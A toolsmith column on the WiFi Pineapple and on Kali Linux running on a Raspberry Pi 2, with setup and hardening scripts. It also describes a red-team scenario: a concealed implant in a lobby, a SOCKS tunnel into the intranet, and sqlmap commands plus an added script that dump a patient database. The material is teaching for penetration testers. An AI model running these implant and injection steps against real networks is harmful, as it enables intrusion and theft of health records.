Prerequisites
WiFi Pineapple
Raspberry Pi 2
Introduction
You could call this particular column the Internet of Toolsmith. As much as I am a curmudgeonly buzzword, catch-phrase hater (I lose my mind at RSA and refuse to go any more), the Internet of Things, or IoT, is all the rage for good reason. Once obscure items are now connected and, as such, at risk. The ability to load a full operating system and a plethora of functionality on a micro device has become trivial thanks to the likes of Raspberry Pi and Arduino. I'd like to point out that the Pwnie Express PwnPlug Elite, built on a SheevaPlug, as discussed in March 2012's toolsmith, was amongst those devices that met the IoT bar before IoT was all the rage. Kudos to that crazy pack o' hackers for seeing the imminent future of security challenges with smart devices. In 2013 Chris Clearfield wrote Rethinking Security for the Internet of Things, wherein he stated that "the growing Internet of Things, the connection of physical devices to the internet, will rapidly expand the number of connected devices integrated into our everyday lives. They also have the potential to allow cyber attackers into the physical world in which we live as they seize on security holes in these new systems." It is in that mindset that we'll converge security assessment tools and services, as implemented on a couple of tiny devices I'm fond of, with ISSA Journal's topic of the month.

Normally, toolsmith focuses on free and open source tools, and the software we'll discuss this month continues to meet that bar. That said, it's impossible to explore IoT without some related "things", so you'll need to make a small investment in one or both of the devices we'll discuss, or experiment similarly on related platforms. If you were to purchase the WiFi Pineapple and the Raspberry Pi 2 (RPI2) kits I own, you'd spend a grand total of $229.

Much as the Pwnie Express crew did, the Hak5 team started building WiFi penetration testing platforms on tiny hardware as early as 2008. The Raspberry Pi project has enabled all sorts of makers to build miniature attack or assessment systems on devices the size of a pack of playing cards. We'll drop Kali Linux on a Raspberry Pi 2 here. I chuckled a bit as I wrote this, as I was reminded that the WiFi Pineapple, intended for WiFi hacking, was itself popped at Defcon 22. The language in the resulting message is too salty to print here, but it starts with "Dear Lamer" and ends with "criminally insecure", which should convey the general concepts. ;-) That said, the Hak5 team addressed the issues quickly, and the device really is a sound, capable investment; let's start there.
WiFi Pineapple
Figure 1 – WiFi Pineapple
WiFi Pineapple use is about as easy as plugging in, connecting the included Cat5 cable to a DHCP-enabled NIC, and browsing to http://172.16.42.1:1471. "The WiFi Pineapple firmware is a heavily modified version of OpenWRT, packed with tools to aid your pen testing." The initial username is root; you assign a password during initial setup. I did flash my Pineapple to the latest firmware, 2.3.0 as this was written, using the WiFi Pineapple MK5 Infusion. Using the Network Infusion, I put my Pineapple in Client Mode so I could connect to the Internet for updates and install additional Infusions. Using the AutoSSH Infusion I set up the AutoSSH service so I could interact with a remote shell and download/upload files via SCP. Real fun with a WiFi Pineapple can be had when you add Infusions. I immediately added sitesurvey, status, monitor, logcheck, connectedclients, notify, and wifimanager, as seen in Figure 2.
Figure 2 – Installing Infusions
Make sure you install all Infusions to SD storage, as there is much more room on the SD card; you'll quickly fill the internal storage if you're not careful.
While the WiFi Pineapple is first and foremost a WiFi attack platform, I believe it can be used as a defensive platform as well, in particular as a monitoring sensor in an area where many WiFi-connected devices are in play and you'd like to keep an eye on the local IoT.
In the Logs Infusion I followed /tmp/pineap.log, which records the SSIDs being probed for, keyed by the probing client's MAC address.
The PineAP Infusion, with MK5 Karma enabled, lets you filter under the Log tab as well. The information content under the PineAP Infusion states that "MK5 Karma is a module of the PineAP suite intended to host spoofed Access Points, or honeypots. This is achieved by replying to probe requests with appropriately crafted probe responses." You can tune MK5 Karma and PineAP as a honeypot to confirm that only trusted, known devices are connecting in your environment. Bear in mind that once Karma answers probes, nearby clients may actually associate with the Pineapple instead of their intended network, so a purely passive sensor should leave Karma off and work from the probe log alone. You can then blacklist and whitelist both clients and SSIDs, and send notifications via email or Pushover based on specific rules if you so choose. All the related Infusions are noted in Figure 3.
Figure 3 – Monitor and notify with Pineapple Infusions
As a result, the WiFi Pineapple, while a fantastic red team tool, can also serve as a defensive monitor in a highly connected environment where only trusted devices are permitted.
Raspberry Pi 2
Loading Kali on a Raspberry Pi 2 is also quite simple and is spelled out nicely on Kali.org. Grab a Class 10 SD card and dd the latest image to the card from a *nix host. I ran dd if=kali-1.1.0-rpi2.img of=/dev/sdb bs=512k (confirm that /dev/sdb really is the card first; dd will not ask), used gparted to resize the partition to use all the available storage on my 32GB SD card, popped the card into my RPI2, and powered it up. You'll log in as root; the initial password is toor, as expected (change it). Then execute startx. Follow the steps in the Kali.org guidance to regenerate your SSH host keys, as all ARM images are pre-configured with the same keys, which means anyone holding the same image also holds your host's private key. Initially, this installation is missing almost all of the Kali packages, easily fixed as follows:
1) apt-get update
2) apt-get upgrade
3) apt-get install kali-linux-full
A bit of patience, as kali-linux-full exceeds 3GB, and voila, you're running Kali on a kick@$$ wallet-sized computer!
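The steps above as one script, added here as my own example rather than anything from Kali.org: it refuses to dd an image whose digest doesn't match the one you copied from the download page, refuses to write over a device that still has mounted partitions, and bundles the first-boot chores (new root password, fresh SSH host keys, the package pull) into one function to run on the Pi. EXPECTED_SHA256 is a placeholder you fill in, the image and device names are the ones from my setup, and sha256sum from GNU coreutils is assumed; the host-key regeneration is the rm/dpkg-reconfigure/restart sequence the Kali ARM guidance describes.

```sh
#!/bin/sh
# Added example, not from the column or kali.org. Flash the RPi2 image only
# after its checksum matches what the Kali download page lists, then harden
# the first boot: new root password, fresh SSH host keys (every Kali ARM image
# ships the same ones), then the package set.
set -u

IMAGE=${IMAGE:-kali-1.1.0-rpi2.img}
DEVICE=${DEVICE:-/dev/sdb}            # check with lsblk first; dd will not ask
EXPECTED_SHA256=${EXPECTED_SHA256:-}  # placeholder: copy from the download page

# verify_image <file> <expected-sha256>: 0 if the digest matches, 1 otherwise
verify_image() {
  actual=$(sha256sum "$1" | cut -d' ' -f1)
  [ "$actual" = "$2" ]
}

# flash_image <file> <device>: refuse to write to a device with mounted partitions
flash_image() {
  if grep -q "^$2" /proc/mounts; then
    echo "refusing: $2 has mounted partitions" >&2
    return 1
  fi
  dd if="$1" of="$2" bs=512k conv=fsync   # note: no space after if=
  sync
}

# Run ON the Pi, as root, right after the first login with root/toor.
first_boot_hardening() {
  passwd root                              # interactive; pick a real one
  rm -f /etc/ssh/ssh_host_*                # drop the keys every ARM image shares
  dpkg-reconfigure openssh-server          # generates new host keys
  service ssh restart
  ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub   # record the new fingerprint
  apt-get update && apt-get -y upgrade && apt-get -y install kali-linux-full
}

case "${1:-}" in
  flash)
    [ -n "$EXPECTED_SHA256" ] || { echo "set EXPECTED_SHA256 first" >&2; exit 1; }
    verify_image "$IMAGE" "$EXPECTED_SHA256" || { echo "checksum mismatch, not flashing" >&2; exit 1; }
    flash_image "$IMAGE" "$DEVICE" ;;
  harden) first_boot_hardening ;;
esac
```

Usage is EXPECTED_SHA256=... sh kali-pi.sh flash on the host, then sh kali-pi.sh harden on the Pi after first login. Keep the fingerprint ssh-keygen prints; it is what you compare against the first time you SSH to the Pi from somewhere new.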
Here's a scenario in which I imagine an RPI2 being useful for a penetration test or red team exercise, given that it is both inexpensive and concealable. You're assessing an organization that has a significant public area (lobby, customer service offices, conference rooms, and an auditorium). The organization offers guest WiFi and does not lock down its numerous Cat5 wall jacks. Your recon determines that:
1) There is a keys-to-the-castle health services database on the internal organization network that is your ultimate goal and primary agenda for the assessment.
2) There is a location in the public space, near a cabinet and a large plant, where a WiFi-enabled RPI2 (Figure 4) can be plugged into both power and one of the unregulated wall jacks. Even if it is discovered in a day or two, you only need a few hours.
Figure 4 – Raspberry Pi 2 (in camera support case)
After "installing" your device, you can access it over the public WiFi, as wlan0 is serving up SSH in the same IP range as your laptop. You're simply sitting in the organization's public café, seemingly browsing the Intarwebs during lunch. As an added bonus, you find that the wired connection to your RPI2 enjoys unfettered access to the internal (intranet) environment. You nmap it accordingly and discover a few hosts offering up HTTP and HTTPS. You can kick in a little X11 forwarding on your RPI2, or tunnel through your RPI2 and browse the sites directly from your laptop in the café. Sure enough, after a bit of review, you discover that one of these web servers hosts the front end for the health services database you seek. You quickly recognize that the Security Development Lifecycle long ago left the building (it may never have entered) and that this front end is rampant with SQL injection vulns. You ready sqlmap and strike while the iron is hot. You run the following from your RPI2 and in four quick steps have dumped the patient db. Great, now you have to write the report.
1) sqlmap.py --url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14" \
   --data="bill_month" --banner
2) sqlmap.py --url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14" \
   --data="bill_month" --dbs
3) sqlmap.py --url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14" \
   --data="bill_month" -D db337433205 --tables
4) sqlmap.py --url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14" \
   --data="bill_month" --dump -D db337433205 -T dbo337433205.PATIENTS
The above gives you the database banner, the populated databases, the tables in the db337433205 database, and then, yep, there's the proverbial gold in that dump (Figure 5).
Figure 5 – SQLmap strikes gold from Kali on Raspberry Pi 2
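The "nmap it, find the web servers, tunnel through the Pi" part of that scenario, written out as a script of my own (added here; it is not from the column or from the sqlmap project). PI_ADDR and INTERNAL_NET are placeholders for the Pi's guest-WiFi address and the wired segment behind it. The web_hosts function parses nmap's grepable (-oG) output, where each port entry reads port/state/proto/owner/service/rpc/version/, and keeps only open ports whose service name starts with http. The tunnel is a plain ssh -D SOCKS forward and sqlmap is pointed at it with --proxy=socks5://, which keeps the laptop from ever touching the intranet directly; using -p bill_month rather than --data is my choice for naming the parameter to test. The nmap output at the bottom is a constructed sample, not a real scan.

```sh
#!/bin/sh
# Added example for the lobby-implant scenario above; not from the column.
# PI_ADDR is the RPi2's guest-WiFi address (wlan0), INTERNAL_NET the wired
# segment behind eth0, both placeholders. Step 1 drives nmap on the Pi over
# SSH, step 2 reduces the grepable output to web servers, step 3 tunnels
# sqlmap through the Pi so the laptop in the cafe never talks to the intranet.
set -u
PI_ADDR=${PI_ADDR:-10.99.0.57}
INTERNAL_NET=${INTERNAL_NET:-10.10.20.0/24}
SOCKS_PORT=${SOCKS_PORT:-1080}

# web_hosts <nmap -oG file>: print "ip port" for every open port whose nmap
# service name starts with http (http, https, http-proxy, https-alt ...).
# Grepable entries look like port/state/proto/owner/service/rpc/version/.
web_hosts() {
  awk '/^Host:/ && /Ports:/ {
    ip = $2
    split($0, half, "Ports: ")
    n = split(half[2], entries, ", ")
    for (i = 1; i <= n; i++) {
      split(entries[i], f, "/")
      if (f[2] == "open" && f[5] ~ /^http/) print ip, f[1]
    }
  }' "$1"
}

# Step 1: scan from the implant, keep the results on the laptop.
scan_internal() {
  ssh root@"$PI_ADDR" "nmap -p 80,443,8080,8443 -oG - $INTERNAL_NET" > internal.gnmap
  web_hosts internal.gnmap
}

# Step 3a: SOCKS5 forward through the Pi (ssh -D), left running in the background.
open_tunnel() {
  ssh -f -N -D "$SOCKS_PORT" root@"$PI_ADDR"
}

# Step 3b: sqlmap against the front end, proxied through the tunnel.
# -p names the parameter to test (my choice; the column used --data) and
# --batch accepts sqlmap's default answers so it runs unattended.
inject() {
  url="http://$1/patients13/?bill_month=8&sec=HSPO14"
  sqlmap --batch --proxy="socks5://127.0.0.1:$SOCKS_PORT" \
    --url="$url" -p bill_month --banner --dbs
}

# Constructed nmap -oG sample (not a real scan) so web_hosts can be exercised
# offline; tabs separate the fields the way nmap writes them.
SAMPLE_GNMAP=$(mktemp)
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
{
  printf '# Nmap 6.47 scan initiated (constructed sample)\n'
  printf 'Host: 10.10.20.5 ()\tStatus: Up\n'
  printf 'Host: 10.10.20.5 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 8080/closed/tcp//http-proxy///\tIgnored State: filtered (0)\n'
  printf 'Host: 10.10.20.9 ()\tPorts: 80/closed/tcp//http///, 443/open/tcp//https///, 8443/open/tcp//https-alt///\n'
  printf 'Host: 10.10.20.12 ()\tPorts: 22/open/tcp//ssh///\n'
} > "$SAMPLE_GNMAP"

case "${1:-demo}" in
  demo)   web_hosts "$SAMPLE_GNMAP" ;;   # two hosts, four open web ports
  scan)   scan_internal ;;
  tunnel) open_tunnel ;;
  inject) inject "${2:?target ip}" ;;
esac
```

Run it as sh implant.sh scan, then sh implant.sh tunnel, then sh implant.sh inject 10.10.20.5 (substituting whichever host scan listed), and carry on with the -D/--tables/--dump steps from the column once --dbs names the database.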
This is but one example of an endless slew of opportunities running Kali and other distros from this credit card-sized device. Grab some spare SD cards and build out a few of your favorites, then swap them in as you want to boot them up. Some RPI2 kits come with NOOBS on an 8GB SD card as well, which will help you get started and get your feet wet. Hackers/makers rejoice! I'm going to add sensors and a camera to my kit so I can implement specific scripted actions when movement is detected.
In Conclusion
Working with the Raspberry Pi 2 or earlier versions gives you so many options. You'll recall that FruityWifi, as discussed in November 2014, is specifically tailored to the Raspberry Pi, and there are Pwn Pi, Raspberry Pwn (from Pwnie Express), and MyLittlePwny, amongst others. Grab a kit today and get started; it'll be great for your Linux skills development, and it can be used for attack or defense. The options are endless. I'd also be remiss if I didn't mention that Microsoft is releasing Windows 10 for IoT (Windows 10 IoT Core), currently in Insider Preview mode, so you can play on the Windows front as well.
Ping me via email or Twitter if you have questions (russ
at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.